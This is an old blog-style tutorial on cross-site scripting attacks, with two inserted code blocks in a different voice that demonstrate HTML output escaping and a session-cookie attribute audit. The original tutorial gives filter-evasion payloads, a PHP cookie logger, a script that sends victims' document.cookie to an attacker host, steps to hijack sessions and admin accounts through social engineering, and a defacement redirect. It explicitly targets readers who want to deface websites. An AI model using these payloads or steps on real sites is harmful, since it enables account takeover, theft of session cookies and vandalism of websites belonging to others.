Monday, 5 December 2011

XSS Tutorial , Cross Site Scripting Complete Method

XSS Tutorial
XSS is an abbreviation for Cross Site Scripting. It uses an X rather than a C in order to reduce confusion between Cascading Style Sheets and Cross Site Scripting. Follow the steps below to perform an XSS attack.

1. Testing for XSS:
First you must check if the website is vulnerable to an XSS injection.
To do this, find a text input field on the victim website. The text that you input must be shown somewhere on the website. Some common XSS injection locations are your username, signature, or contact information on a member profile, a post or thread on a forum, or a web search that reflects your search ("You searched for TEXT").
Once you find a location on the website that fits the above requirements you can input a test injection. Enter <script>alert(1)</script> into the text field and submit the form. It should return an alert (pop-up) containing the number 1. Remember to try this in multiple browsers, as some, like Google Chrome, aren't affected by all XSS injections and may not create an alert.

2. Filter Evasion:
Sometimes your victims will attempt to protect themselves from XSS injections by implementing poor input filters. Here are a few scenarios:
Scenario 1: If it returns a blank/empty reflection or an “Invalid Input” error then the website is most likely blocking the keywords <script> and </script>. You can bypass this filter simply by changing the case of the script tag. For example, <SCRIPT>alert(1)</SCRIPT> or <ScripT>alert(1)</ScripT>.
Scenario 2: If it returns your script with quotes around it ("<script>alert(1)</script>") then you can attempt to close the quotes before you start the script. You can do this by adding "> before the script. For example, "><script>alert(1)</script>. The quotes matter because, when they enclose the script, the browser treats it as plain text and it does not run.
Scenario 3: If it returns your script without the <script> tag (only alert(1)) then it is only removing the tags and not considering the whole input invalid. To bypass this just add another tag around the <script> tag. For example, <sc<script>ript>alert(1)</sc</script>ript>. The filter will automatically remove the tag covering your input, therefore only <script>alert(1)</script> will remain.
Scenario 4: If the website simply won’t allow you to post the script tags or the alert you can attempt to encode your script into hex. You can do this by using Xlate or any other free ASCII to hex converter. Once you get the hex version of the script you can enter it in just as you would do with the ASCII version of the script and it will have the same outcome.
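As an added example (not code from the original post), here is a strip-once filter of the kind Scenarios 1 and 3 describe, placed beside the output encoding a site should use instead; the inputs are the test strings from the post and the function names are my own.

```javascript
// Added example: a blacklist filter versus HTML output encoding.

// Naive filter in the style the post describes: removes one <script>...</script>
// pair, case-sensitively, and hands the rest to the page as HTML.
function naiveStripScript(input) {
  return input.replace(/<script>/, "").replace(/<\/script>/, "");
}

// Correct defence for text placed into an HTML body or attribute value:
// encode every character that carries HTML meaning, so the input is always
// rendered as data regardless of case, nesting, or quoting tricks.
function escapeHtml(input) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  };
  return String(input).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Constructed inputs: the test strings walked through in Scenarios 1-3.
const samples = [
  "<script>alert(1)</script>",
  "<SCRIPT>alert(1)</SCRIPT>",
  "<sc<script>ript>alert(1)</sc</script>ript>",
  '"><script>alert(1)</script>',
];

// Side-by-side result for one sample: what each approach would emit into the page.
function compare(sample) {
  return { naive: naiveStripScript(sample), escaped: escapeHtml(sample) };
}

for (const s of samples) console.log(compare(s));
```

The naive filter leaves the second and third samples containing a live script tag, while every escaped output is inert text.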
3. MaxLength limitations:
In many cases input fields will have a limit to the amount of characters that can be entered and sometimes your script will exceed that limit. There are a few methods that can be used to bypass this:
Method 1: On some websites you will be able to increase the maximum amount of characters allowed. To change the MaxLength perform the following steps:
1. Right click on the input field
2. Click ‘inspect element’
3. Find the line which holds <input id="query" type="text" maxlength="10" size="13" name="search_term"> and increase the number after maxlength=".
4. Submit the form. If it returns an error stating that the information entered in the form was faulty then the website is not vulnerable to this.
Method 2: Upload the script to your server and enter it to use as the source. There are two ways to do this:
1. <img src=’http://YourSite.com/YourScript.js’></img>
2. <script src=’http://YourSite.com/YourScript.js’></script>
4. Attack Vectors:
There are two main types of XSS vulnerabilities, reflected and persistent. A reflected XSS is one in which you fill out an input field of something like a search bar, email subscription field, or anything else that won’t permanently remain on the website and will disappear as soon as you leave the page. These will take effect with the help of Social Engineering. A persistent XSS vulnerability is used in locations on a website such as a comment field, public profile information or anything else that will remain on-site and visible to other people.
If you find a persistent XSS on a website you will be able to run any script that you want which includes having the ability to deface that certain page(which I assume that the majority of you reading this want).
If you find a reflected XSS you'll be able to run scripts on the site like cookie stealing and CSRF but it will require some social engineering. I consider cookie stealing very useful and will explain why further on in this tutorial but I will also show you how to deface a website via a persistent XSS vulnerability.
Cookie Stealing
1. Find a vulnerable XSS location on the website. We'll use Site.com/search.word?=(Script Here).
2. Set up a web server to host your cookie logger. You can use a paid web host like Go Daddy and Host Gator or a free one like x10hosting.com.
3. Open notepad and paste the following:
PHP Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Save it as logger.php.
4. Upload logger.php to the root folder of your web server.
5. Add a file named log.txt to the root folder as well.
6. Add the following script to your XSS injectable URL (replace YourSite.com/logger.php with your site/logger.php).
Code:
<script>document.location="http://www.YourSite.com/logger.php?cookie=" + document.cookie;</script>
If you want to make this less noticeable then you can use another script that redirects them back to the victim site after they visit your cookie logger:
Code:
<script language="JavaScript">document.location="http://YourSite.com/logger.php?cookie=" + document.cookie;document.location="http://www.Site.com"</script>
7. Send your target the XSS injected link. For example, ours would be Site.com/search.word?=<script>document.location="http://www.YourSite.com/logger.php?cookie=" + document.cookie;</script>. If you don't want your target to see the script you can encode it into hex just like Scenario 4 of Filter Evasion. Only encode the script (everything after Site.com/search.word?=).
8. You have successfully logged their cookies! Site.com has sent them to your logger and you now have their site.com cookies. Now gather their PHPSESSID or any other session ID cookie that you’ve logged.
9. Download the add-on “Edit This Cookie” for Google Chrome and Mozilla Firefox.
10. Go to Edit This Cookie and replace your session ID with theirs. Now click 'Submit Cookie Changes'. You should now be logged in to the admin's/target's account. You can now do anything that doesn't require you to enter their password, from making a post or sending a Private Message to (if you're on an administrator account) deleting threads, maybe defacing the website, or banning members.
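As an added example (not code from the original post), the following audits a Set-Cookie header for the attributes that decide whether the document.cookie theft above works at all: a session cookie flagged HttpOnly is not exposed to document.cookie, and SameSite limits the CSRF use mentioned earlier. The header values and function names are constructed for illustration.

```javascript
// Added example: check a session cookie for the protections that blunt
// document.cookie exfiltration and cross-site request riding.

// Parse "name=value; Attr; Attr=val" into name, value and a map of
// lowercase attribute names to their values (true when the attribute is bare).
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const [name, ...rest] = parts[0].split("=");
  const attrs = new Map();
  for (const p of parts.slice(1)) {
    const i = p.indexOf("=");
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    const val = i === -1 ? true : p.slice(i + 1).trim();
    attrs.set(key, val);
  }
  return { name: name.trim(), value: rest.join("="), attrs };
}

// Return a list of weaknesses; an empty list means the cookie carries the
// three attributes a session cookie should have.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attrs.has("httponly")) {
    findings.push("missing HttpOnly: readable through document.cookie by injected script");
  }
  if (!c.attrs.has("secure")) {
    findings.push("missing Secure: sent over plain HTTP and exposed on the wire");
  }
  const sameSite = String(c.attrs.get("samesite") || "").toLowerCase();
  if (sameSite !== "lax" && sameSite !== "strict") {
    findings.push("SameSite not Lax/Strict: attached to cross-site requests (CSRF)");
  }
  return findings;
}

// Constructed headers: the kind of cookie the tutorial's logger harvests,
// and a hardened version of the same cookie.
const WEAK_COOKIE = "PHPSESSID=abc123; Path=/";
const HARDENED_COOKIE = "PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax";

console.log(auditSessionCookie(WEAK_COOKIE));
console.log(auditSessionCookie(HARDENED_COOKIE));
```

HttpOnly stops the cookie from being read by script but not from being used by script-driven requests made from the injected page, so it complements output encoding rather than replacing it.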
Defacing
1. Find a persistent XSS and enter the following script:
Code:
<script>window.location="http://YourSite.com/Deface.html";</script>
Now the page will redirect to your deface.
